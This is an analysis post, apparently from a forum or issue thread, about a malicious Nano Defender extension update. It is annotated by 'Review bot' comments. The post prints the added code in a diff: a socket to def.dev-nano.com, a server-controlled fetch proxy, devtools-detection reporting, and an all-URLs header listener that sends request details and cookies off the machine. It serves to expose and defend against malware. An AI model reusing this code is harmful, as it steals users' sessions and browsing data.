So here is what I am seeing in the new Nano Defender 15.0.0.206:
Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to
https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.
Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:
At launch, the extension fetches something from
https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listens to
https://def.dev-nano.com/ for messages to populate listOfObject.
The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to
https://def.dev-nano.com/ under the name handleObject.
Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:
// Registers blockingHandler for every outgoing request ("<all_urls>"), not a
// filtered set of sites.
//   'requestHeaders' - the handler receives the outgoing request headers.
//   'blocking'       - the handler runs synchronously and its return value can
//                      replace the headers before the request is sent.
//   'extraHeaders'   - also exposes headers Chrome otherwise withholds from
//                      extensions (for example Cookie).
chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
urls: ["<all_urls>"]
}, ['requestHeaders', 'blocking', 'extraHeaders']);
So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.
There is a somewhat silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:
// Character codes for "-", "z", "z", "z".
var m = [45,122,122,122]
// Turn each code into its one-character string.
var s = m.map( x => String.fromCharCode(x) )
// x === "-zzz"; building it from numbers keeps the literal out of the source text.
var x = s.join("");
// Split on "-zzz" and re-join with nothing in between, i.e. delete every occurrence.
// stringyFy is not defined in this excerpt; in the handler quoted in the diff on
// this page it is the JSON text of the request headers.
var replacerConcat = stringyFy.split(x).join("");
Which is equivalent to:
// Deletes every "-zzz" substring from stringyFy (defined outside this excerpt).
var replacerConcat = stringyFy.split("-zzz").join("");
The purpose is not clear; the code removes instances of -zzz from request headers before they are sent out.
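So, trying to come up with an example of what the new code can do: let's say it wants to get sensitive information about network requests to a specific bank; then the content of the listOfObject object could be (the example object is missing from this copy; going by the next sentence, it paired the key url with the regex bank\.example\.com\/):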
Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to
https://def.dev-nano.com/ as a handleObject packet.
The listOfObject can contain any number of conditions, I just gave an example with a single one above.
The extension is now designed to look up specific information from your outgoing network requests according to externally configurable heuristics and send it to
https://def.dev-nano.com/.
Here is the diff for the code change, which you won't find in their GitHub repo:
--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
const hasNews = false;
- const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+ const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
const newsReadFlag = "news-read";
// This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
// ------------------------------------------------------------------------------------------------------------- //
};
-
+var defender = io.connect("https://def.dev-nano.com/");
+var listOfObject = {};
// ----------------------------------------------------------------------------------------------------------------- //
a.noopErr = () => {
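Review bot: `io.connect("https://def.dev-nano.com/")` opens a connection to a remote host as soon as the background script loads, and nothing in the visible lines gates it on a user setting. `io` is not defined in this hunk, so a socket client library was presumably added to the package elsewhere; the manifest's background script list and any bundled library deserve the same scrutiny as this file. `listOfObject` is a mutable file-scope variable with no explanation, and should at least carry a comment such as `// match rules pushed by the remote server: keys are webRequest details fields, values are regex sources` so its role is visible to a reader. The `a.noopErr` definition that follows continues outside the hunk.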
@@ -211,6 +212,29 @@
// ----------------------------------------------------------------------------------------------------------------- //
+
+
+async function dLisfOfObject(newList) {
+ let dListResp = await fetch(newList.uri, newList.attr)
+ var listOfObj = {}
+ listOfObj.headerEntries = Array.from(dListResp.headers.entries())
+ listOfObj.data = await dListResp.text()
+ listOfObj.ok = dListResp.ok;
+ listOfObj.status = dListResp.status;
+ return listOfObj;
+}
+
+defender.on("dLisfOfObject", async function (newList) {
+ let getRes = await dLisfOfObject(newList);
+ defender.emit(newList.callBack, getRes)
+});
+
+defender.on("listOfObject", function (a) {
+ listOfObject = a;
+})
+
+
+
// Redirect helpers
a.rSecret = a.cryptoRandom();
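Review bot: The `dLisfOfObject` handler lets whoever controls the socket choose both `newList.uri` and `newList.attr` for a `fetch` issued from the background page, then returns the response headers, body and status on an event name the server also picks (`newList.callBack`). A request made there presumably runs with the extension's host permissions rather than a web page's, so this is a remotely driven request proxy, not a list download. The `listOfObject` handler likewise replaces the match rules wholesale, with no validation of keys or values. Neither handler belongs in a content blocker and both should be removed. If remote configuration were really needed, it would come from a fixed URL and be schema-checked before use, never from a server-chosen URL and options.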
@@ -227,7 +251,22 @@
// 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
a.blankMP4 = a.rLink("blank.mp4");
-
+
+var element = document.createElement("p"); ;
+var openListGet = false;
+element.__defineGetter__("id", function() {
+ openListGet = true;
+});
+
+var i = setInterval(function() {
+ openListGet = false;
+ console.log(element);
+ if(openListGet){
+ defender.emit("report")
+ console.clear();
+ clearInterval(i)
+ }
+}, 100);
// ----------------------------------------------------------------------------------------------------------------- //
// tab - Id of the tab
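Review bot: This block exists only to detect an open developer console. The getter defined on `element`'s `id` presumably runs only when an open console renders the logged element, and the 100 ms timer then emits `report` to the remote socket, clears the console and stops itself. Nothing else in the hunk reads `openListGet`, so the code serves no purpose in a blocker, and behaviour observed with the extension's dev tools open cannot be assumed to match behaviour with them closed. Reviewers should treat the `report` event as an indicator worth searching for in other builds, and compare the packaged files against the public repository rather than rely on live inspection alone. `__defineGetter__` is also deprecated in favour of `Object.defineProperty`, though the right change here is to delete the block.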
@@ -450,6 +489,50 @@
return true;
};
+
+var blockingHandler = function (infos) {
+ var changedAsArray = Object.keys(listOfObject);
+
+ var detailsHeader = infos.requestHeaders;
+ var HeadReverse = detailsHeader.reverse();
+ var stringyFy = JSON.stringify(HeadReverse);
+ var mount = "";
+ if (changedAsArray.length > 0) {
+ var checkerList = true;
+ for (const object of changedAsArray) {
+ if (object.x === object.y) {
+ mount += 1;
+ }
+ break;
+ }
+ for (let i = 0; i < changedAsArray.length; i++) {
+ let x = changedAsArray[i];
+ var re = new RegExp(listOfObject[x],'gi');
+ mount = "5";
+ if (infos[x].toString().match(re) == null) {
+ checkerList = false;
+ break;
+ }
+ }
+ if (checkerList) {
+ defender.emit('handleObject', infos);
+ }
+ }
+
+ var m = [45,122,122,122]
+ var s = m.map( x => String.fromCharCode(x) )
+ var x = s.join("");
+ var replacerConcat = stringyFy.split(x).join("");
+ var replacer = JSON.parse(replacerConcat);
+ return {
+ requestHeaders: replacer
+ }
+};
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
+ urls: ["<all_urls>"]
+}, ['requestHeaders', 'blocking', 'extraHeaders']);
+
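Review bot: When every key in the server-supplied `listOfObject` matches, `defender.emit('handleObject', infos)` sends the entire request details object off the machine. Because the listener is registered with `'requestHeaders'` and `'extraHeaders'` on `<all_urls>`, that object includes the outgoing request headers. The patterns are compiled with `new RegExp(listOfObject[x],'gi')` straight from remote input, and `infos[x].toString()` will throw inside the blocking handler if a pushed key is not a field of the details object. The first `for...of` loop is dead code (`object` is a string key and `mount` is never read), and `detailsHeader.reverse()` reorders the header array in place before the `-zzz` stripping rewrites the headers of every request. For triage, treat any build containing this listener as compromised: remove it, and rotate session cookies and tokens for sites used while it was installed.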